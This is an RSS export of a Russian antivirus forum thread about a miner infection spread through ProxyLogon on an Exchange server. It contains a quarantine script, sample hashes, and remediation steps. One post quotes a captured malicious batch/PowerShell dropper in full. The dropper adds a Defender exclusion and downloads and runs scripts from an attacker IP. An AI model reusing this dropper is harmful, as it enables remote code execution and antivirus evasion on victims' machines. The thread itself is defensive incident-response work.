			<pubDate>Sat, 04 Sep 2021 16:38:34 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16547/message113036/">Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</a></b> <i>ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			линки проверки по некоторым файлам (никто не детектирует):<br /><br />
====code====
<pre>https://www.virustotal.com/gui/file/deb133c8f85c0708ebff915797dc3704e78e2adda5c9eae97a8c53a4135ddaff/detection
https://www.virustotal.com/gui/file/6588c802ec136a166f92396bb51c9ebe69719da6910d3f7ff40c333e3ea0ea98/detection
https://www.virustotal.com/gui/file/e35ed505119a886d545f3210c74962c535e0d0e1591fdd5a9d13b3f56443b723/detection
https://www.virustotal.com/gui/file/63039acdb05c5e4ce1c6a65bca22055452b4634e5df582b8436c844bf9019186/detection
https://www.virustotal.com/gui/file/9c761e20613137cedd320d9f4c88c65d0ef2aeac8661aecac9d0a95db02c5d77/detection
https://www.virustotal.com/gui/file/deb133c8f85c0708ebff915797dc3704e78e2adda5c9eae97a8c53a4135ddaff/detection
https://www.virustotal.com/gui/file/4aa37c55df8c1fde0f5c332d19b0ebb22db79f93e90e94fbb7bc02e991666395/detection
https://www.virustotal.com/gui/file/6588c802ec136a166f92396bb51c9ebe69719da6910d3f7ff40c333e3ea0ea98/detection
https://www.virustotal.com/gui/file/345862e88e8b47d20c559f6ac372f868656835f0647d15c435d874094f0f8317/detection
https://www.virustotal.com/gui/file/c05515ef4226a9db4243dce236397478593748dfca1c2ffcccc0450f9d06037e/detection
https://www.virustotal.com/gui/file/7513547bebd3d83f1438167cb11819b0610a2f7a1f89804f978ae97ff029f0cb/detection
https://www.virustotal.com/gui/file/55b722732ab41905349d5344e2a434e96a5af145a09b8c5388f89c6a57111450/detection
https://www.virustotal.com/gui/file/f3b6290400e848294dc816d2376e77993492b3a7c819462501e1c195ac2e5bb0/detection
https://www.virustotal.com/gui/file/de0609ed07aa71419e8c7ca5c7e2ca6e70ce06b064337bc333725fd6fe28d4b3/detection
https://www.virustotal.com/gui/file/e35ed505119a886d545f3210c74962c535e0d0e1591fdd5a9d13b3f56443b723/detection
https://www.virustotal.com/gui/file/e9812f1c6bfff30ffbcda27811e1378ecd1d46cfa72a842dc709a82835d71037/detection

https://www.virustotal.com/gui/file-analysis/MmRmYjY2Yjc0ZWE0YjBjYWU3YWJkNDY1ZTkxNTRjYTE6MTYzMDc2MTk5NA==/detection</pre>
=============
<br /><br />пример файла:<br /><br />====quote====<br />Полное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_QDEJ0KXZ.DLL<br />Имя файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; APP_WEB_QDEJ0KXZ.DLL<br />Тек. статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; АКТИВНЫЙ DLL <br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Сохраненная информация &nbsp; &nbsp; &nbsp;на момент создания образа<br />Статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;АКТИВНЫЙ DLL <br />File_Id &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 6132493F28000<br />Linker &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;11.0<br />Размер &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;140288 байт<br />Создан &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;03.09.2021 в 19:11:43<br />Изменен &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 03.09.2021 в 19:11:44<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />TimeStamp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 03.09.2021 в 16:11:43<br />EntryPoint &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+<br />OS Version &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;4.0<br />Subsystem &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Windows character-mode user interface (CUI) subsystem<br />IMAGE_FILE_DLL &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+<br />IMAGE_FILE_EXECUTABLE_IMAGE +<br />Тип файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 32-х битный ИСПОЛНЯЕМЫЙ<br />Цифр. подпись &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Отсутствует либо ее не удалось проверить<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Доп. информация &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; на момент обновления списка<br />SHA1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;496888AF336F11C54580B8DA6178D639A1A1AF2A<br />MD5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 459A9B4D05142528E55B721C73E7C8CE<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Процессы &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;на момент обновления списка<br />Процесс &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; C:\WINDOWS\SYSTEM32\INETSRV\W3WP.EXE [16888]<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />=============<br /><br />надо понять, что это за файлы: свежие, без цифровой, загружены легитимным процессов <br />
			<i>04.09.2021 16:27:30, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16547/message113036/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16547/message113036/</guid>
			<pubDate>Sat, 04 Sep 2021 16:27:30 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16547/message113035/">Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</a></b> <i>ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_EEkqvaqi" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />архив из каталога uVS (по формату: ZOO_гггг-мм-дд_чч-мм-сс.rar/7z) &nbsp;отправить в <noindex><a href="mailto:safety@chklst.ru" target="_blank" rel="nofollow">safety@chklst.ru</a></noindex><br />=============<br />Готово. <br />
			<i>04.09.2021 16:14:22, Mr Burila.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16547/message113035/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16547/message113035/</guid>
			<pubDate>Sat, 04 Sep 2021 16:14:22 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16547/message113034/">Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</a></b> <i>ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			выполняем скрипт в uVS:<br />- скопировать содержимое кода в буфер обмена;<br />- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;<br />- закрываем все браузеры перед выполнением скрипта;<br />
====code====
<pre>

;uVS v4.11.8 &#91;http://dsrt.dyndns.org:8888&#93;
;Target OS: NTv6.3
v400c
OFFSGNSAVE
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_BROWSERS.CM1GY-YR.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_GLOBAL.ASAX.9ROHC7PQ.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;RPC&#92;296C8D2F&#92;5A4276D8&#92;APP_GLOBAL.ASAX.B43PI4NY.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;AUTODISCOVER&#92;1E0EBF5E&#92;81BBFD0C&#92;APP_GLOBAL.ASAX.CQHP4HAL.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;EWS&#92;82CED47D&#92;9F9837FE&#92;APP_GLOBAL.ASAX.F82CQ-3M.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;OWA_CALENDAR&#92;50586ABB&#92;43FE3563&#92;APP_GLOBAL.ASAX.FJON4ZRX.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;MAPI&#92;236CA80D&#92;613D0742&#92;APP_GLOBAL.ASAX.GFOSMOYG.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;AUTODISCOVER&#92;B455E468&#92;CBAAC37D&#92;APP_GLOBAL.ASAX.LOVEIRWB.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;OWA&#92;8E05B027&#92;E164D61B&#92;APP_GLOBAL.ASAX.N3CT8VNU.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;OWA&#92;F1907565&#92;9FA11D9F&#92;APP_GLOBAL.ASAX.P7BTXYGD.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;OAB&#92;5A665F22&#92;C3DD660B&#92;APP_GLOBAL.ASAX.QXTXGCN5.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;EWS&#92;9BF2358A&#92;E86A63DA&#92;APP_GLOBAL.ASAX.RGDBHA8I.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;MAPI_EMSMDB&#92;FF130E68&#92;58BD4667&#92;APP_GLOBAL.ASAX.T_-RLTDU.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;POWERSHELL&#92;788CBAD3&#92;5ED4F687&#92;APP_GLOBAL.ASAX.VOPJ5BFR.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;1CD810A3&#92;710C31B6&#92;APP_GLOBAL.ASAX.ZIGCDRV_.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_THEME_DEFAULT._PA_PVFA.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_WEB_0EXSSJHG.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_WEB_2X1TGTE0.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_WEB_2ZYUFYVK.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_WEB_BZJN21B2.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_WEB_DPLFNAEX.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_WEB_FHHKYG34.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_WEB_FRZ2LSJQ.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_WEB_HHL3EFGE.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_WEB_LUOS5NMH.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_WEB_MT1YTSHN.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;OWA&#92;8E05B027&#92;E164D61B&#92;APP_WEB_O5BJKYBG.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_WEB_OCV4TGXS.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_WEB_QDEJ0KXZ.DLL
zoo %SystemRoot%&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A&#92;APP_WEB_WKYXHA1V.DLL
czoo
QUIT
</pre>
=============
<br />без перезагрузки<br />архив из каталога uVS (по формату: ZOO_гггг-мм-дд_чч-мм-сс.rar/7z) &nbsp;отправить в safety@chklst.ru<br />------------ <br />
			<i>04.09.2021 15:48:47, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16547/message113034/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16547/message113034/</guid>
			<pubDate>Sat, 04 Sep 2021 15:48:47 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16547/message113033/">Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</a></b> <i>ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Сообщение получилось объемное, могу условно разделить его на несколько логических частей:<br /><br />1. Суть инцидента (рабочая версия)<br />2. Описание проявлений и обнаружения<br />3. Предполагаемая схема лечения хостов сети (в процессе дополнения)<br />4. Описание и вопрос по лечению &quot;ворот&quot; атаки (почтовый сервер)<br />5. Дополнительная информация: ссылки на статьи по теме, логи детектов вирусной активности с зараженных машин<br /><br /><B>1. Суть инцидента (рабочая версия):</B><br /><br />Воспользовавшись цепочкой уязвимостей ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065) на необновленном почтовом сервере (отсутствовал мартовский патч безопасности) злоумышленники через открытый 443 порт обошли аутентификацию на сервере Exchange и получили возможность для удаленного запуска произвольного кода. <br />На сервер был загружен первичный веб-шелл для дальнейшего развития атаки и скомпрометированы пароли, в частности пароль локального администратора, который на всех хостах сети был одинаковый.<br /><br />После осуществилось заражение хостов корпоративной сети вирусом-майнером. Антивирусы определяют его как:<br /><ul><li>HEUR:Trojan.Multi.GenAutorunSvc.ksws &nbsp; &nbsp;&#91;Каspersky Security for Windows Server&#93;<br /><li>Trojan.Multi.GenAutorunWMI.a, Trojan.Multi.GenAutorunReg.c, PDM:Trojan.Win32.Generic &nbsp; &nbsp;&#91;Kaspersky Cloud на клиентских машинах&#93;<br /><li>PowerShellMulDrop.129 + PowerShellDownLoader.1452 &nbsp; &nbsp;&#91;DrWeb CureIT&#93;<br /></ul>Есть подозрение, что зловред сканирует сеть и, используя удалённое управление посредством WMI, заставляет удаленную машину скачивать с интернета и выполнять скрипты Powershell. Возможно при этом еще используется psexec.exe и уязвимость SMBv1, но это не точно. <br /><br />Заражает машины с Windows 7, Server 2008, Server 2012, как физические, так и виртуальные. Компы с WinXP и Server2003 вирусу пока не интересны. <br />Корпоративная сеть: несколько территориально разнесенных филиалов (соединены vpn-туннелями по топологии &quot;звезда&quot;), два независимых леса AD и ряд не входящих не в один домен серверов/клиентских машин. <br />Заразились хосты как состоящие в доменах, так и вне их (скорее всего из-за того, что пароль локального администратора на всех хостах был одинаковый).<br /><br /><B>2. Описание проявлений и обнаружения</B><br /><br />Если антивирус на машине не стоит, то загрузка процессоров под 100% процессами schtasks.exe и несколькими powershell.exe<br />Если антивирус установлен (например, Касперский), то в логах &quot;Мониторинг активности&quot; содержатся регулярные записи об обнаружении/запрещении зловреда:<br /><I><br /></I><I>Пользователь: NT AUTHORITY\система</I><br /><I>Тип пользователя: Системный пользователь</I><br /><I>Название: PDM:Exploit.Win32.Generic</I><br /><I>Путь к объекту: c:\windows\system32</I><br /><I>Имя объекта: cmd.exe </I><br />и<br /><I>Путь к объекту: c:\windows\system32\wbem</I><br /><I>Имя объекта: wmiprvse.exe</I><br /><br />На пролеченных серверах с установленным Каspersky Security for Windows Server ситуация аналогичная: нагрузка отсутствует, но установленный антивирус периодически режет попытки вылезти в интернет:<br /><br /><I>Событие: Обнаружен веб-адрес.</I><br /><I>Объект: </I><noindex><a href="http://fastrepunicat.spdns.org:8000/in6.ps1" target="_blank" rel="nofollow"><I>http://fastrepunicat.spdns.org:8000/in6.ps1</I></a></noindex><I> (или </I><noindex><a href="http://45.10.69.139:8000/in6.ps1" target="_blank" rel="nofollow"><I>http://45.10.69.139:8000/in6.ps1</I></a></noindex><I>)</I><br /><I>Имя процесса: wmiprvse.exe</I><br /><br />Так же на ряде компов в автозагрузке было обнаружена строка c:\windows\temp\sysupdater0.bat<br />Антивирус при обнаружении этот файл обычно казнит (<I>У программы обнаружено подозрительное поведение, характерное для вредоносной программы:</I><br /><I>Обнаружено: PDM:Trojan.Win32.Generic</I>), но удалось раздобыть один, вот содержимое:<br /><br /><I>etlocal EnableDelayedExpansion &amp; for /f &quot;tokens=2 delims=.&#91;&quot; %%i in ('ver') do (set a=%%i)&amp;if !a:~-1!==5 </I><br /><I>(</I><br /><I> &nbsp; &nbsp;@echo on error resume next&gt;%windir%\11.vbs&amp;</I><br /><I> &nbsp; &nbsp;@echo Set ox=CreateObject^(&quot;MSXML2.XMLHTTP&quot;^)&gt;&gt;%windir%\11.vbs&amp;</I><br /><I> &nbsp; &nbsp;@echo ox.open &quot;GET&quot;,&quot;</I><noindex><a href="http://45.10.69.139:8000/info.vbs,false&gt;&gt;%windir%\11.vbs&amp;" target="_blank" rel="nofollow"><I>http://45.10.69.139:8000/info.vbs&quot;,false&gt;&gt;%windir%\11.vbs&amp;</I></a></noindex><I>;</I><br /><I> &nbsp; &nbsp;@echo ox.send^(^)&gt;&gt;%windir%\11.vbs&amp;</I><br /><I> &nbsp; &nbsp;@echo If ox.Status=200 Then&gt;&gt;%windir%\11.vbs&amp;</I><br /><I> &nbsp; &nbsp;@echo Set oas=CreateObject^(&quot;ADODB.Stream&quot;^)&gt;&gt;%windir%\11.vbs&amp;</I><br /><I> &nbsp; &nbsp;@echo oas.Open&gt;&gt;%windir%\11.vbs&amp;</I><br /><I> &nbsp; &nbsp;@echo oas.Type=1 &gt;&gt;%windir%\11.vbs&amp;</I><br /><I> &nbsp; &nbsp;@echo oas.Write ox.ResponseBody&gt;&gt;%windir%\11.vbs&amp;</I><br /><I> &nbsp; &nbsp;@echo oas.SaveToFile &quot;%windir%\info.vbs&quot;,2 &gt;&gt;%windir%\11.vbs&amp;</I><br /><I> &nbsp; &nbsp;@echo oas.Close&gt;&gt;%windir%\11.vbs&amp;</I><br /><I> &nbsp; &nbsp;@echo End if&gt;&gt;%windir%\11.vbs&amp;</I><br /><I> &nbsp; &nbsp;@echo Set os=CreateObject^(&quot;WScript.Shell&quot;^)&gt;&gt;%windir%\11.vbs&amp;</I><br /><I> &nbsp; &nbsp;@echo os.Exec^(&quot;cscript.exe %windir%\info.vbs&quot;^)&gt;&gt;%windir%\11.vbs&amp;</I><br /><I> &nbsp; &nbsp;cscript.exe %windir%\11.vbs</I><br /><I>) </I><br /><I>else </I><br /><I>(</I><br /><I> &nbsp; &nbsp;setlocal DisableDelayedExpansion&amp;powershell &quot;Add-MpPreference -ExclusionProcess</I><br /><I> &nbsp; &nbsp;'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe';</I><br /><I> &nbsp; &nbsp;&#91;System.Net.ServicePointManager&#93;::ServerCertificateValidationCallback = {$true}; </I><br /><I> &nbsp; &nbsp;$aa=(&#91;string&#93;(Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ))</I><br /><I> &nbsp; &nbsp;;if(($aa -eq $null) -or !$aa.contains('SCM Event8 Log')) </I><br /><I> &nbsp; &nbsp;{</I><br /><I> &nbsp; &nbsp; &nbsp; &nbsp;if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64'))</I><br /><I> &nbsp; &nbsp; &nbsp; &nbsp;{</I><br /><I> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;IEX(New-Object Net.WebClient).DownloadString('</I><noindex><a href="http://45.10.69.139:8000/in6.ps1" target="_blank" rel="nofollow"><I>http://45.10.69.139:8000/in6.ps1</I></a></noindex><I>')</I><br /><I> &nbsp; &nbsp; &nbsp; &nbsp;}</I><br /><I> &nbsp; &nbsp; &nbsp; &nbsp;else</I><br /><I> &nbsp; &nbsp; &nbsp; &nbsp;{</I><br /><I> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;IEX(New-Object Net.WebClient).DownloadString('</I><noindex><a href="http://45.10.69.139:8000/in3.ps1" target="_blank" rel="nofollow"><I>http://45.10.69.139:8000/in3.ps1</I></a></noindex><I>')</I><br /><I> &nbsp; &nbsp; &nbsp; &nbsp;}</I><br /><I> &nbsp; &nbsp;}&quot;</I><br /><I>)</I><br /><br /><B>3. Предполагаемая схема лечения хостов сети (в процессе дополнения):<br /></B><br /><ol><li>На пограничных с интернетом устройствах запретить обращение извне на порт 8000 и адреса из диапазона 23.236.64.0-23.236.79.255 45.10.0.0 - 45.10.255.255<br /><li>Групповыми политиками в разделах &quot;Компьютер&quot; и &quot;Пользователь&quot; запретить выполнение .js, .ps1, .vbs, .wsc, .wsf, .wsh, .bat, .jse, .pif, .scr. Запрещено не только в политике домена, но и локально на машинах, которые в домен не входят<br /><li>Антивирусная проверка: сначала утилитами Drweb CurIT и/или KVRT, после проведения работ - установленным Касперским<br /><li>Смена пароля локального админа. Для каждого филиала свой пароль, различается для клиентов и серверов.<br /><li>Очистка папок C:\Windows\Temp и c:\Users\%username\AppData\Local\Temp\<br /><li>Очистка точек восстановления<br /><li>Ревизия автозагрузки при помощи autoruns (sysinternals) - на некоторых хостах был прописан sysupdater0.bat<br /><li>Установить все возможные обновления ОС. Патчи CVE-2019-0859 и MS17-010 ставились вручную.<br /><li>Сменить пароль доменного администратора<br /><li>Провести ревизию &quot;левых&quot; пользователей в домене, в приоритете в привилегированных группах<br /></ol>Отдельная сноска про смену пароля локального администратора на хостах: если пароль не сменить, то проверка и патчи не помогают. Пример: после пролечивания двумя утилитами подряд, установки патчей и полной проверки компьютера, доложившей об отсутствии угроз, этот же компьютер чуть позже уведомил, что в системной памяти обнаружен Trojan.Multi.GenAutorunReg.c.<br /><br />Данные пункты были осуществлены в двух филиалах, после чего в логах антивируса на хостах этих филиалов прекратились детекты зловредов и попыток вылезти в интернет.<br /><br />Есть еще ряд пунктов, которые посоветовали неравнодушные люди, но я их еще не обкатывал на практике, поэтому приводить в данном сообщении не буду.<br />После проверки отпишусь в теме и дополню алгоритм решения инцидента.<br /><br />Пока могу упомянуть следующее: на зараженных хостах, с которых было зафиксировано обращение по вредоносным адресам, обнаружены службы с произвольными именами (например LFRJLAFYBRJFQEBBLCCB или YVRDGSBWEDTLLHHLUKXW).<br />Есть мнение, основное заражение происходит через wmi подписки и классы, а они уже раскатывают все остальные службы и т.п. <br />В системе зафиксированы вредоносные классы в корне root\default и root\Subscription.<br />В результате антивирусной проверки Касперский должен их удалять, но случается так, что по каким-то причинам вредонос остаётся.<br /><br />Команды по поиску и удалению вредоносных классов (запускаются в PowerShell, должны подходить для всех ОС с powershell 2.0 и выше):<br /><br /><I>Get-WmiObject -Namespace root\Default -List | where {$_.Name -eq'systemcore_Updater'} | Remove-WmiObject -Verbose</I><br /><br />Если после лечения все равно все равно детекты или не удаление:<br /><ul><li>Имя объекта: WMI-Consumer:SCM Event8 Log Consumer<br /><li>Имя объекта: WMI-Consumer:SCM Event8 Log Consumer2<br /></ul>Команды удаления:<br /><ul><li>Get-WMIObject -Namespace root\Subscription -Class __EventFilter 